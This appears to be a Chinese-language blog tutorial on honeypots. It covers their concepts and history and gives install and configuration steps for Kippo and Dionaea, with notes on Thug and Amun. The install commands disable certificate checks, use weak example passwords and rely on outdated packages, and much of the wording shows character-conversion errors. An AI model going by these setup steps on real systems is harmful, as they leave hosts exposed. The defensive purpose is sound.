The Honeynet ProjectThe Honeynet Project

catalogue

1. 蜜罐基本概念
2. Kippo: SSH低交互蜜罐安裝、使用
3. Dionaea: 低交互式蜜罐框架部署
4. Thug
5. Amun malware honeypots
6. Glastopf web honeypot
7. Wordpot
8. Conpot SCADA/ICS honeypot
9. phoneyc
10. shockpot
11. MHN(Modern Honey Network)
12. Database Honeypots
13. awesome-honeypots
14. Honey Drive
15. Dockpot
16. 咱們該怎麼利用蜜罐系統進行入侵分析
17. Detecting Honeypots(反檢測-蜜罐檢測技術)
18. DNS Honeypot

 

1. 蜜罐基本概念

蜜罐技術，經過蜜罐技術能夠捕獲到黑客的攻擊規則，從而爲咱們提取、建模攻擊模式提供數據基礎

1. 蜜罐比如是情報收集系統。它是故意引誘黑客攻擊的目標
2. 黑客入侵後，咱們能夠收集他的攻擊軌跡，知道他是如何發動攻擊的
3. 其中重要的一點機器是虛假的，攻擊者須要花費時間攻破。在這段時間內，系統管理員可以鎖定攻擊者同時保護真正的機器
4. 可以學習攻擊者針對該服務的攻擊技巧和利用代碼
5. 一些蜜罐可以捕獲惡意軟件，利用代碼等等，可以捕獲攻擊者的0day,同時能夠幫助逆向工程師經過分析捕獲的惡意軟件來提升自身系統的安全性
6. 在內網中部署的蜜罐能夠幫助你發現內網中其餘機器可能存在的漏洞 

The exact definition of a honeypot is contentious, however most definitions are some form of the following

A honeypot is an "an information system resource whose value lies in unauthorized or illicit use of that resources"(from the www.securityfocus.com forum)

A more practical, but more limiting, definition is given by pcmag.com

A server that is configured to detect an intruder by mirroring a real production system(根據真實生產環境鏡像出的系統). It appears as an ordinary server doing work, but all the data and transactions are phony. Located either in or outside the firewall, the honeypot is used to learn about an intruder's techniques as well as determine vulnerabilities in the real system

0x1: 數據收集是設置蜜罐的另外一項技術挑戰

1) 蜜罐監控者只要記錄下進出系統的每一個數據包，就可以對黑客的所做所爲一清二楚
2) 蜜罐自己上面的日誌文件也是很好的數據來源。
3) 但同時要注意的是日誌文件很容易被攻擊者刪除(尤爲是對於高交互蜜罐)，因此一般的辦法就是讓蜜罐向在同一網絡上但防護機制較完善的遠程系統日誌服務器發送日誌備份
4) 務必同時監控日誌服務器。若是攻擊者用新手法闖入了服務器，那麼蜜罐無疑會證實其價值

0x2: 蜜罐的優點/劣勢

1. 優勢

1. 蜜罐系統的優勢之一就是它們大大減小了所要分析的數據，對於一般的網站或郵件服務器，攻擊流量一般會被合法流量所淹沒，而蜜罐進出的數據大部分是攻擊流量。於是，瀏覽數據、查明攻擊者的實際行爲也就容易多了
2. Fewer false positives since no legitimate traffic uses honeypot Collect smaller, higher-value, datasets since they only log illegitimate activity 
3. Work in encrypted environments 
4. Do not require known attack signatures, unlike IDS

2. 缺點

1. Can be used by attacker to attack other systems
2. Only monitor interactions made directly with the honeypot - the honeypot cannot detect attacks against other systems 
3. Can potentially be detected by the attacker

0x3: 蜜罐技術的發展歷史

蜜罐工具的發展歷史:
1. 蜜罐工具DTK:
綁定在系統的未使用端口上,對任何想探測這些端口的攻擊源提供欺騙性網絡服務

2. LaBrea蜜罐軟件:
接受網絡上全部空閒IP 地址的TCP 鏈接,並經過TCP 協議中的窗口調節與持久鏈接等技巧實現一種Tarpit 服務,可以儘量地拖長無效鏈接的持續時間,從而減緩網絡掃描探測與蠕蟲傳播的速度
http://support.microsoft.com/kb/842851/zh-cn

3. Honeyd
著名安全專家Provos開發的一款"虛擬蜜罐框架性開源軟件"
    1) 引入了在網絡協議棧層次上模擬各類類型蜜罐系統的方法
    2) Honeyd 支持在"協議棧指紋特徵"上假裝成指定的操做系統版本,對攻擊者利用nmap 等工具實施主動指紋識別進行欺騙
    3) 支持模擬構建虛擬網絡拓撲結構,並以插件方式提供對各類應用層網絡服務的模擬響應
    4) 利用Honeyd軟件, 安全研究人員能夠很容易地按照需求定製出一個包含指定操做系統類型與應用服務的蜜罐系統,用於蠕蟲檢測與應對、垃圾郵件監測等多種用途
    5) 因爲Honeyd 最先引入了網絡協議棧層次上的蜜罐系統模擬機制,以及採用了可集成各類應用層服務蜜罐的靈活框架性結構,使其在蜜罐工具軟件發展過程當中具備舉足輕重的重要地位

4. The Honeynet Project Giraffe Chapter 開發的Nepenthes蜜罐軟件
    1) 它繼承了Honeyd 的網絡協議棧模擬機制與框架性結構, 針對互聯網上主動傳播惡意代碼的監測需求, 實現了可供大規模部署的惡意代碼樣本採集工具
    2) 與以前蜜罐系統嘗試模擬整個網絡服務交互過程不一樣, Nepenthes 的基本設計原則是隻模擬網絡服務中存在安全漏洞的部分, 使用"Shellcode 啓發式識別"與"仿真執行技術"來發現針
對網絡服務安全漏洞的滲透攻擊, 從中提取到主動傳播惡意代碼的下載連接,並進一步捕獲樣本
    3) 這種機制使其較其餘已有蜜罐工具對自動化傳播惡意代碼捕獲更爲高效
目前業內主流的蜜罐項目
The Honeynet Project
http://www.honeynet.org/codeofconduct 

5. Dionaea
Nepenthes已被新一代惡意代碼樣本捕獲蜜罐軟件Dionaea所替代
    1) Dionaea採用內嵌Python 腳本代碼實現對漏洞服務的模擬
    2) 一樣採用Libemu來檢測Shellcode
    3) 並支持IPv6 與TLS 協議
    4) Dionaea蜜罐軟件是目前技術最爲先進、體系結構最優化的虛擬蜜罐工具

6. GHH(Google hack honeypot)
    1) 針對Web應用攻擊威脅研究並開發的Web應用服務蜜罐
    2) GHH針對搜索存有安全漏洞Web應用程序的Google Hacking技術來誘騙Web應用程序攻擊並進行日誌記錄,能夠發現命令注入、Web 垃圾郵件、博客垃圾評論注入、網頁篡改、植入殭屍
程序、搭建釣魚站點等各類攻擊事件

7. HIHAT(high interaction honeypot analysistoolkit)
    1) 可將任意的PHP應用程序自動地轉換爲提供充分交互環境的Web蜜罐工具
    2) 並經過"透明連接方式"獲取惡意Web訪問請求, 從而對現有PHP應用程序所面臨的威脅進行監測分析

8. Kojoney、Kippo蜜罐
    1) 模擬爲SSH網絡服務進程, 記錄每次SSH口令暴力破解所嘗試使用的用戶名與口令
    2) 並在口令猜想成功以後爲攻擊者提供模擬的shell 執行環境
    3) 對攻擊源IP 地址、使用的SSH 客戶端類型、輸入的控制命令以及下載的攻擊工具文件進行捕獲與記錄.

9. 客戶端蜜罐工具軟件Capture-HPC
    1) 近年來,因爲防火牆、入侵防護系統等網絡邊界防護機制的普遍應用,針對傳統網絡服務的滲透攻擊變得
    愈來愈難以成功實現,以瀏覽器與插件爲主要目標的客戶端滲透攻擊逐漸成爲互聯網上的主流安全威脅
    2) 而蜜罐技術也隨着安全威脅熱點的這一變化,演化出客戶端蜜罐工具軟件.Capture-HPC
    3) 這是一個高交互式的客戶端蜜罐框架,支持在Windows 虛擬機環境中運行IE,Firefox 等瀏覽器,並經過內核中的系統狀態變化監控機制來檢測瀏覽器當前訪問的網頁中是否包含客戶端
滲透攻擊代碼

10. PhoneyC
    1) 採用"瀏覽器仿真"與"Javascript動態分析技術"來對抗惡意網頁腳本的混淆機制
    2) 並經過模擬各類已知瀏覽器與插件安全漏洞來檢測出惡意網頁中包含的滲透攻擊類型
    3) 經過對Javascript引擎進行opcode指令動態插裝,實現了對惡意網頁中的heapspray 堆散射攻擊的檢測能力.

0x4: 蜜罐技術的關鍵

1. 核心機制
核心機制是蜜罐技術達成對攻擊方進行誘騙與檢測的必須組件
    1) 欺騙環境構建機制: 構造出對攻擊方具備誘騙性的安全資源，吸引攻擊方對其進行探測、攻擊與利用，這裏所謂的"安全資源"能夠理解爲存在受攻擊面的一切資源，包括
        1.1) 蜜罐所模擬的操做系統，即系統級漏洞，例如MS06-28
        1.2) 蜜罐所模擬的系統服務、系統端口，例如RPC、SMP、FTP
        1.3) 蜜罐所模擬的應用層服務: CMS系統、VoIP等
    2) 威脅數據捕獲機制: 對誘捕到的安全威脅進行日誌記錄，儘量全面地獲取各類類型的安全威脅原始數據:
        2.1) 網絡鏈接
        2.2) 原始數據包
        2.3) 系統行爲數據
        2.4) 惡意代碼樣本(.exe、shellcode)
    3) 威脅數據分析機制: 在捕獲的安全威脅原始數據的基礎上，分析追溯安全威脅的類型與根源，並對安全威脅姿式進行感知

2. 輔助機制
對蜜罐技術其餘擴展需求的概括，主要包括:
    1) 安全風險控制機制
    2) 配置與管理機制
    3) 反蜜罐技術對抗機制等
輔助機制的主要目標
    1) 安全風險控制機制要確保部署蜜罐系統不被攻擊方惡意利用去攻擊互聯網和業務網絡,讓部署
    方規避道德甚至法律風險;
    2) 配置與管理機制使得部署方能夠便捷地對蜜罐系統進行定製與維護;
    3) 反蜜罐技術對抗機制的目標是提高蜜罐系統的誘騙效果,避免被具備較高技術水平的攻擊方利用反蜜罐技術而識別

0x5: 根據交互程度第蜜罐進行分類

1. Low-Interaction Honeypot(低交互蜜罐: 虛擬出一個服務)
    1) 服務端蜜罐: DTK、LaBrea、Honeyd、Nepenthes、Dionaea
    2) 應用層蜜罐: Glastopf、GlastopNG、SPAMPot、Kojoney、Kippo
    3) 客戶端蜜罐: PhoneyC
2. High-Interation Honeypot(高交互蜜罐: 旁路在一個真實的服務以後，進行蜜罐監控)
    1) 服務端蜜罐: HoneyBow、Argos
    2) 應用層蜜罐: GHH、HIHAT
    3) 客戶端蜜罐: Capture-HPC HoneyMonkey、SpyProxy
3. 粘性蜜罐(Tarpits): 這種類型的蜜罐，使用新的IP來生成新的虛擬機，模擬存在服務的漏洞，來作誘餌。所以攻擊者會花費長時間來攻擊，就有足夠的時間來處理攻擊，同時鎖定攻擊者 
4. 專門捕獲惡意軟件的密碼: 例如模擬出存在shelllock、jenklin、redis、strut二、udf漏洞的服務，誘使攻擊者入侵後種植惡意程序，從而獲取樣本

Relevant Link:

http://dionaea.carnivore.it/
http://netsec.ccert.edu.cn/zhugejw/2011/09/08/kippo/
http://297020555.blog.51cto.com/1396304/553382/
http://netsec.ccert.edu.cn/zhugejw/files/2011/09/Kippo介紹PPT.pdf
http://netsec.ccert.edu.cn/zhugejw/files/2011/09/Kippo-介紹.pdf
http://www.2cto.com/Article/201403/285377.html
http://blog.csdn.net/sealyao/article/details/6708923
http://security.ctocio.com.cn/securitycomment/414/8185414.shtml
http://netsec.ccert.edu.cn/zhugejw/2011/09/08/kippo/
面向蜜場環境的網絡攻擊流重定向機制的研究與實現.pdf
Dionaea低交互式蜜罐介紹.pdf
Collapsar.pdf
2007.通訊學報.HoneyBow_一個基於高交互式蜜罐技術的惡意代碼自動捕獲器.諸葛建偉.pdf
蜜罐技術研究與應用進展.pdf
Kippo介紹PPT.pdf
Kippo-介紹.pdf
Dionaea低交互式蜜罐部署實踐.pdf
http://ruo.me/index.php/archives/77
http://www.05112.com/anquan/wzaq/stwx/2014/0312/8400.html
http://www.05112.com/anquan/wlgf/2013/0609/3444.html
http://www.freebuf.com/articles/system/12696.html
http://dionaea.carnivore.it/
https://en.wikipedia.org/wiki/Honeypot_(computing)
https://www.projecthoneypot.org/index.php
http://www.honeynet.org/
http://www.honeyd.org/background.php
http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey.pdf
https://www.honeynet.org/node/1267
http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-honeynet-project/bh-us-03-honeynet.pdf

The Honeynet Project

http://www.honeynet.org/project 

 

2. Kippo: SSH低交互蜜罐安裝、使用

Kippo是採用Python模擬出一個端口監聽服務，模仿SSH服務端的樣子與潛在的攻擊者進行僞交互的一款開源軟件
Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker

0x1: Features

1. Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
2. Possibility of adding fake file contents so the attacker can 'cat' files such as /etc/passwd. Only minimal file contents are included
3. Session logs stored in an UML Compatible format for easy replay with original timings
4. Just like Kojoney, Kippo saves files downloaded with wget for later inspection
5. Trickery; ssh pretends to connect somewhere, exit doesn't really exit, etc

0x2: REH5安裝

1. rhel5下下載準備環境的的RPM包
python26-2.6-geekymedia1.i386.rpm
python26-2.6-geekymedia1.src.rpm
python26-debuginfo-2.6-geekymedia1.i386.rpm
python26-devel-2.6-geekymedia1.i386.rpm
python26-libs-2.6-geekymedia1.i386.rpm
python26-test-2.6-geekymedia1.i386.rpm
python26-tools-2.6-geekymedia1.i386.rpm
tkinter26-2.6-geekymedia1.i386.rpm
Twisted-10.2.0.tar.bz2
zope.interface-3.3.0.tar.gz
pycrypto-2.0.1.tar.gz
pyasn1-0.0.12a.tar.gz

2. 安裝這些準備環境軟件包
    1) libTix8.4.so is needed by tkinter26-2.6-geekymedia1.i386
    yum install tix tcl tk
    2) 安裝RPM包
    rpm -ivh *.rpm
    3) 安裝Twisted
    tar -xvf Twisted-10.2.0.tar.bz2  
    cd Twisted-10.2.0  
    python26 setup.py build  
    python26 setup.py install   
    4) 安裝zope
    tar -xvf zope.interface-3.3.0.tar.gz  
    cd zope.interface-3.3.0  
    python26 setup.py build  
    python26 setup.py install   
    5) 安裝pycrypto
    tar -xvf pycrypto-2.0.1.tar.gz  
    cd pycrypto-2.0.1  
    python26 setup.py build  
    python26 setup.py install  
    6) 安裝pyasn1
    unzip pyasn1-0.0.12a.tar.gz  
    cd pyasn1-0.0.12a  
    python26 setup.py build  
    python26 setup.py install  

3. 準備Kippo的日誌記錄環境
    1) kippo須要把數據存放到數據庫中，因此單首創建一個kippo的庫 
    /etc/init.d/mysqld start 
    mysql -uroot -p111
    create database kippo;  
    grant all privileges on kippo.* to kippo@'localhost' identified by 'kippo';  
    flush privileges; 
    2) 生成Kippo須要的數據表
    cd /usr/local/src/kippo-0.5/doc/sql/ 
    vim mysql.sql: 在頭部加上一句: USE kippo
    mysql -ukippo -pkippo  < mysql.sql 
 
4. 安裝Kippo，以非root用戶運行
    1) wget http://kippo.googlecode.com/files/kippo-0.5.tar.gz  
    2) tar zxvf kippo-0.5.tar.gz 
    3) cd /usr/local/src/kippo-0.5
    4) vim kippo.cfg 
    4) useradd kippo
    5) chown -R kippo.kippo /usr/local/src/kippo-0.5 
    5) su -l kippo
    6) cd /usr/local/src/kippo-0.5
    7) ssh-keygen -t rsa
    ./private.key
    28:a5:58:10:78:39:ee:ed:69:1c:9e:c1:b8:9f:81:57 kippouser@node2
    7) ./start.sh

5. import MySQLdb, uuid exceptions.ImportError: No module named MySQLdb Failed to load application: No module named MySQLdb
    1) 下載、安裝setuptools
    wget http://pypi.python.org/packages/source/s/setuptools/setuptools-0.6c11.tar.gz --no-check-certificate
    tar zxvf setuptools-0.6c11.tar.gz   
    cd setuptools-0.6c11  
    python26 setup.py build  
    python26 setup.py install  
    2) 下載、安裝mysql-python
    wget https://pypi.python.org/packages/source/M/MySQL-python/MySQL-python-1.2.3.tar.gz --no-check-certificate
    tar zxvf MySQL-python-1.2.3.tar.gz
    cd  MySQL-python-1.2.3
    python26 setup.py build  
    python26 setup.py install 

安裝完畢
在客戶機上進行遠程登陸
ssh root@192.168.159.128 -p 2222
輸入密碼123456(剛纔在配置文件裏配置的)

6. 經過日誌或數據庫查看記錄
cd /usr/local/src/kippo-0.5
tail -10 log/kippo.log

程序啓動後，SSH蜜罐就啓動了，並監聽來自外部的鏈接

Kippo會自動把全部訪問軌跡都記錄下來，並保存到Mysql中(若是你有配置的話)，那怎麼解讀這些數據就是咱們接下來的問題了，即數據可視化，從什麼角度去分析這些數據，從原則上來說，咱們進行入侵分析，要作到如下幾個方面:

1) 儘量多的覆蓋多的可能的訪問路徑，即儘量多的模擬多一些主流的服務、端口、應用
2) 便可能全面的記錄下全部的訪問軌跡，在數據記錄階段應該廣而雜地記錄全部可能有用的信息，爲一下進行數據提取、分層做準備
3) 從入侵、反入侵領域的角度去看待已經記錄下的數據，創建相應的分析模型，這種模型應該具備很強的針對性。能直接、或間接地反映出入侵趨勢、緣由、強度

http://bruteforce.gr/kippo-graph，能夠實現必定程度上的數據可視化，咱們能夠在它的基礎上進行功能拓展，從而更好地對蜜罐捕獲到的數據進行建模分析
SSH蜜罐可視化技術

0x3: Ubuntu 14.04 64安裝

git clone https://github.com/desaster/kippo.git
cd kippo
pip install twisted
pip install twisted --upgrade

pip install PyCrypto 
pip install pycparser

sudo apt-get install libffi-dev
pip install cffi
wget https://pypi.python.org/packages/source/c/cffi/cffi-1.5.2.tar.gz
tar -zvxf cffi-1.5.2.tar.gz
cd cffi-1.5.2
python setup.py install

pip install idna
pip install pyasn1
pip install enum34
pip install ipaddress 
pip install cryptography
pip install cryptography --upgrade

useradd littlehann
su littlehann

cp kippo.cfg.dist kippo.cfg
./start.sh

Files of interest

1. data: 存放ssh key,lastlog.txt和userdb.txt lastlog.txt:last命令的輸出,即存儲了登錄蜜罐的信息,也能夠僞造 userdb.txt:能夠登錄的用戶,能夠給一個用戶設置多個密碼,一個用戶一行 格式爲username:uid:password

2. honeyfs: etc目錄中存在group hostname hosts issue passwd resolv.conf shadow這些 文件,cat /etc/filename目錄中對應的文件時會顯示這些文本文件中的內容. proc目錄中存在cpuinfo meminfo version這些文件,cat /proc/filename目錄中對應的文件時會顯示這些文本文件中的內容.

3. log: 存放日誌文件的地方,該目錄包含一個kippo.log文件和tty目錄 kippo.log:是存放啓動記錄,那些IP鏈接等信息 tty目錄是每個ssh過來後操做的記錄,可使用strings filename直接看到裏面的內容

4. txtcmds: 存放命令的地方,這些命令都是文本文件,執行相關命令的時候直接顯示文件內容

5. kippo: 核心文件,模擬一些交互式的命令等等

6. dl: wget等等下載的文件存放的地方

7. utils: convert32.py:把tty的日誌轉換爲標準32位的小數格式,其實直接strings查看就能夠了 createfs.py:能夠用來模擬真實系統的一些文件目錄之類的,不過須要設置一下須要重定向保存輸出,而後去替換fs.pickle文件,這樣就能夠模擬真實系統了.

8. fsctl.py:用來修改已經生成的fs.pickle的文件,help有命令的幫助

9. passdb.py:是來添加帳戶密碼的 

10. playloh.py:對log/tty/下的日誌進行回放的

Relevant Link:

關於Kippo的安裝、配置參考如下文章
http://code.google.com/p/kippo/
http://www.haiyun.me/archives/centos-install-kippo.html
http://297020555.blog.51cto.com/1396304/553382/
http://drops.wooyun.org/papers/4578
https://github.com/desaster/kippo

 

3. Dionaea: 低交互式蜜罐框架部署

Dionaea雖然也是一個低交互的蜜罐系統，但和Kippo不一樣的是，Dionaea集成了不少不一樣類型的蜜罐在一塊兒，總體來講是一個框架的結構，方便開源社區進行擴展，支持FTP、HTTP、SSH、mysql、mssql、sip等協議的蜜罐模擬，咱們可使用它來部署更加貼近真實的蜜罐環境，從而能更有效的捕獲攻擊樣本、和攻擊軌跡數據

Dionaea 蜜罐的設計目的是誘捕惡意攻擊，獲取惡意攻擊會話與惡意代碼程序樣本。它經過模擬各類常見服務:

1) 捕獲對服務的攻擊數據
2) 記錄攻擊源和目標IP、端口、協議類型等信息
3) 以及完整的網絡會話過程
4) 自動分析其中可能包含的 shellcode 及其中的函數調用和下載文件，並獲取惡意程序

Dionaea 的總體結構和工做機制

1) Dionaea是運行於Linux上的一個應用程序，將程序運行於網絡環境下，它開放Internet上常見服務的默認端口，當有外來鏈接時，模擬正常服務給予反饋，同時記錄下出入網絡數據流。
2) 網絡數據流經由檢測模塊檢測後按類別進行處理，若是有 shellcode 則進行仿真執行
3) 程序會自動下載 shellcode 中指定下載或後續攻擊命令指定下載的惡意文件。從捕獲數據到下載惡意文件
4) 整個流程的信息都被保存到數據庫中，留待分析或提交到第三方分析機構。

(圖片來自Dionaea低交互式蜜罐介紹--諸葛建偉的paper)

Dionaea能夠模擬的服務

1) SMB
2) http、https
3) ftp、tftp
4) MSSQL、MySQL
5) SIP (VoIP)
6) shellcode執行
7) malware下載、執行

關於Dionaea的安裝、配置請參考如下文章

http://ruo.me/index.php/archives/77
http://www.05112.com/anquan/wzaq/stwx/2014/0312/8400.html
http://dionaea.carnivore.it/

1. 安裝依賴
apt-get update
apt-get install aptitude 
aptitude install libudns-dev 
aptitude install libglib2.0-dev 
aptitude install libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion 
git-core flex bison pkg-config

2) 生成Dionaea的目錄
mkdir /opt/dionaea
cd /opt/dionaea
 
3) 安裝其餘依賴
cd /opt/dionaea
    3.1) liblcfg
    git clone git://git.carnivore.it/liblcfg.git 
    cd liblcfg/code
    autoreconf -vi
    ./configure --prefix=/opt/dionaea
    make install
    cd ..
    cd ..
    3.2) libemu
    git clone git://git.carnivore.it/libemu.git  
    cd libemu
    autoreconf -vi
    ./configure --prefix=/opt/dionaea
    make install
    cd ..
    3.3) libnl
    apt-get install libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev
    3.4) libev
    wget http://dist.schmorp.de/libev/Attic/libev-4.04.tar.gz
    tar xfz libev-4.04.tar.gz
    cd libev-4.04
    ./configure --prefix=/opt/dionaea
    make install
    cd ..
    3.5) Python 3.2
    wget https://www.python.org/ftp/python/3.2.2/Python-3.2.2.tgz
    tar xfz Python-3.2.2.tgz
    cd Python-3.2.2/
    ./configure --enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6 LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/ 
-L/usr/lib/i386-linux-gnu/"
    make && make install
    cd /opt/dionaea/bin
    ln python3.2 /usr/bin/python3
    cd ..
    3.6) sqlite 3.3.7
    wget http://www.sqlite.com.cn/Upfiles/source/sqlite-3.3.7.tar.gz
    tar xzf sqlite-3.3.7.tar.gz
    cd sqlite-3.3.7
    mkdir /home/sqlite-3.3.7
    ./configure --prefix=/home/sqlite-3.3.7
    make && make install && make doc
    cd /home/sqlite-3.3.7/bin/
    ln sqlite3 /usr/bin/sqlite3
    3.7) Cython 
    cd /opt/dionaea
    wget http://cython.org/release/Cython-0.15.tar.gz
    tar xfz Cython-0.15.tar.gz
    cd Cython-0.15
    /opt/dionaea/bin/python3 setup.py install
    cd ..
    3.8) libpcap 
    wget http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
    tar xfz libpcap-1.1.1.tar.gz
    cd libpcap-1.1.1
    ./configure --prefix=/opt/dionaea
    make && make install
    cd ..
4) 編譯安裝dionaea
git clone git://git.carnivore.it/dionaea.git  
cd dionaea
autoreconf -vi
./configure --with-lcfg-include=/opt/dionaea/include/ \
      --with-lcfg-lib=/opt/dionaea/lib/ \
      --with-python=/opt/dionaea/bin/python3.2 \
      --with-cython-dir=/opt/dionaea/bin \
      --with-udns-include=/opt/dionaea/include/ \
      --with-udns-lib=/opt/dionaea/lib/ \
      --with-emu-include=/opt/dionaea/include/ \
      --with-emu-lib=/opt/dionaea/lib/ \
      --with-gc-include=/usr/include/gc \
      --with-ev-include=/opt/dionaea/include \
      --with-ev-lib=/opt/dionaea/lib \
      --with-nl-include=/opt/dionaea/include \
      --with-nl-lib=/opt/dionaea/lib/ \
      --with-curl-config=/usr/bin/ \
      --with-pcap-include=/opt/dionaea/include \
      --with-pcap-lib=/opt/dionaea/lib/
make && make install

安裝完畢後，能夠採用後臺運行的方式啓動

Dionaea根據命令參數運行，可選擇:

1) 不一樣的運行環境
2) 任務
3) 篩選事件
4) 記錄內容

配置文件則具體規定:

1) 蜜罐運行後開啓的模塊
2) 記錄文件的保存位置
3) 擴展功能的參數

默認配置下Dionaea自動選擇一個網絡接口進行監聽

cd /opt/dionaea/bin
1) ./dionaea -l all,-debug -L '*'
2) ./dionaea -l all,-debug -L 'con*,py*'
3) ./dionaea -u nobody -g nogroup -r /opt/dionaea/ -w /opt/dionaea -p /opt/dionaea/var/dionaea.pid

Dionaea會在這些端口進行監聽，並捕獲來自潛在攻擊者的訪問軌跡數據

相比於Kippo，Dionaea由於架構龐大了許多，因此配置文件、模塊結構看起來也複雜了許多，這也是正常的，咱們能夠把它和MSF的架構進行類比，就會發現不少異同點，Dionaea的服務模擬都是經過獨立的模塊，用python腳本予以實現，而配置文件中則包含了這些模塊的相關信息

咱們簡單學習一下它的配置文件

Dionaea 默認下配置文件是/opt/dionaea/etc/dionaea.conf。配置文件內容分爲:
1. logging
配置日誌的存放部分、事件記錄級別、所在域。包括普通日誌和錯誤日誌，默認下位於/opt/dionaea/var/log目錄下，分別記錄全部事件、警告、錯誤事件

2. processors
配置libemu、和用於導出數據流的模塊streamdumper

3. libemu
可增減容許的協議，配置shellcode檢測時支持的最大流大小、跟蹤步數限制、和併發執行數等性能參數

4. streamdumper
配置導出數據流時容許和拒絕的協議、數據流保存的位置

5. downloads
配置惡意文件下載的保存的位置

6. bistreams
配置數據流保存的位置

7. submit
設置自動經過http提交惡意文件到特定地址，具體配置信息依賴於服務器的設定

8. listen
配置Dionaea進行監聽的網絡接口IP，默認下自動獲取

9. modules
配置各類模塊的工做參數。部分"必須模塊": curl、libemu、pcap模擬的服務services等信息

對於蜜罐系統，數據可視化、數據建模解讀永遠是一個重點，關於Dionaea的捕獲數據解析有如下方式

1. 使用dionaea附帶的工具進行日誌讀取
cd /opt/dionaea/dionaea/modules/python/util
python3 ./readlogsqltree.py -t $(date '+%s')-24*3600 /opt/dionaea/var/dionaea/logsql.sqlite
python3 ./gnuplotsql.py -d /opt/dionaea/var/dionaea/logsql.sqlite -p smbd -p epmapper -p mssqld -p httpd -p ftpd

2. 利用DionaeaFR進行可視化展現
cd /opt/
git clone https://github.com/RootingPuntoEs/DionaeaFR.git
cd /opt/DionaeaFR
這個工具涉及到node.js、django等工具，以前沒有接觸過，不過感受業內用它們作數據可視化挺多的，接下來準備入手研究一下，試試用node.js、django搞點好玩的
http://www.freebuf.com/articles/system/12696.html

 

4. Thug

1. Thug is a Python low-interaction honeyclient based on an hybrid static/dynamic analysis approach.
2. Thug provides a DOM implementation which is (almost) compliant with W3C DOM Core, HTML, Events, Views and Style specifications (Level 1, 2 and partially 3).  
3. Thug makes use of the Google V8 Javascript engine wrapped through PyV8 in order to analyze malicious Javascript code and of the Libemu library wrapped through Pylibemu in order to detect and emulate shellcodes.
4. Currently 9 Internet Explorer (Windows XP, Windows 2000, Windows 7, Windows 10)
    1) Microsoft Edge (Windows 10)
    2) Chrome (Windows XP, Windows 7, MacOS X, Android 4.0.3, Android 4.0.4, Android 4.1.2, Linux, iOS 7.1, iOS 7.1.1, iOS 7.1.2, iOS 8.0.2, iOS 8.1.1, iOS 8.4.1, iOS 9.0.2)
    3) Firefox (Windows XP, Windows 7, Linux)
    4) Safari (Windows XP, Windows 7, MacOS X, iOS 7.0.4, iOS 8.0.2, iOS 9.1)
personalities are emulated and about 90 vulnerability modules (ActiveX controls, core browser functionalities, browser plugins) are provided.

0x1: Build and Install

Relevant Link:

http://buffer.github.io/thug/doc/intro.html
http://buffer.github.io/thug/doc/index.html

 

5. Amun malware honeypots

In this report we describe a low-interaction honeypot, whichiscapableofcapturingautonomousspreadingmalware from the internet, named Amun. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities the payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local harddisc, for further analyses. As a result, we are able to collect at best unknown binaries of malware that automatically spreads across the network. The collected samples can for example be used to help anti-virus vendors improve their signatures.
0x1: Implementation

Amun is written in Python1, a small and simple scripting language. The honeypot is made up of different components

1. Amun Kerneli
2. Request Handler
3. Vulnerability Modules
4. Shellcode Analyzer
5. Download Modules
6. Logging Modules 
7. Submission Modules

1. Amun Kernel

The Amun Kernel is the core component of the honeypot. This part contains the startup and configuration routines, as well as, the main routines of the software。During the startup phase 

1. the Amun Kernel initialises the regular expressions that are used for shellcode matching
2. reads the main configuration file: "conf/amun.conf"
3. creates the internal logging modules
4. loads all external modules. 
    1) vulnerability modules: responsible for emulating single vulnerabilities
    2) the logging modules: that log attack information to other services like databases
    3) the submission modules, that for example write downloaded binaries to hard disc. 

For each loaded vulnerability module, the Amun Kernel retrieves the list of accociated ports and stores the vulnerability module in an array with the port as key

Array ( 
    [139] => Array ( 
        [0] => vuln-netdde 
        [1] => vuln-ms06040 
    ) 
    [445] => Array ( 
        [0] => vuln-ms08067 
        [1] => vuln-ms06040 
        [3] => vuln-ms06070 
    ) 
)

因此咱們能夠把多個vul module處理邏輯綁定在同一個端口上，例如80端口上存在多個漏洞
After all initial modules are loaded and the appropriate TCP servers are started, Amun Kernel enters the main loop.
During this loop,it iterates over all connected sockets

1. triggers download events
2. transfers information to certain modules
3. and re-reads the main configuration file for changes. The re-reading of the main configuration file allows to change certain settings during runtime. Amun does not have to be stopped and restarted.

2. Amun Configuration
Amun utilizes a single configuration file for adjusting all parameters necessary to run the honeyot

1. ip: It defines the IP address Amun will listen on during runtime. 
    1) It takes a single IP address as parameter 
    2) or the wildcard IP address 0.0.0.0 to listen on all addresses and interfaces assigned to the host system. 
    3) or IP address ranges (192.168.0.1 - 192.168.0.5)
    4) or provide an interface name (e.g. eth0)
    5) CIDR notation for networks (192.168.0.0/24)
    6) or single comma separated IP adresses. 用逗號分隔多個IP項 
2.  a user and group can be defined, which limit the privileges of Amun.
3. timeout parameters, which adjust the way Amun timeouts connections, open ports, and download requests. As some attacks might not work correctly it is possible, that attackers for example do not connect to the requested port, therefore, Amun needs to close this port after a certain amount of time has been passed. The options are named: 
    1) connection timeout
    2) bindport timeout
    3) ftp timeout.  
4. Amun also offers the possibility to reject certain attacking hosts from reconnecting in the case of certain events. These events are: 
    1) malware download was refused
    2) download did not finish due to a timeout
    3) a binary was already successfully downloaded
    4) and the host already successfully exploited the honeypot
5. http header filesize check
A lot of malware downloads use HTTP as transfer protocol and one feature of a HTTP server is to store the file size in the HTTP header of the reply. If check http filesize isenabled, Amun will compare the size of the downloaded binary with the value in received in the HTTP header. In case there is a mismatch, the downloaded file is discarded

6. replace local ip with attacker ip(將Shellcode中的內網IP替換爲攻擊者的來源IP)
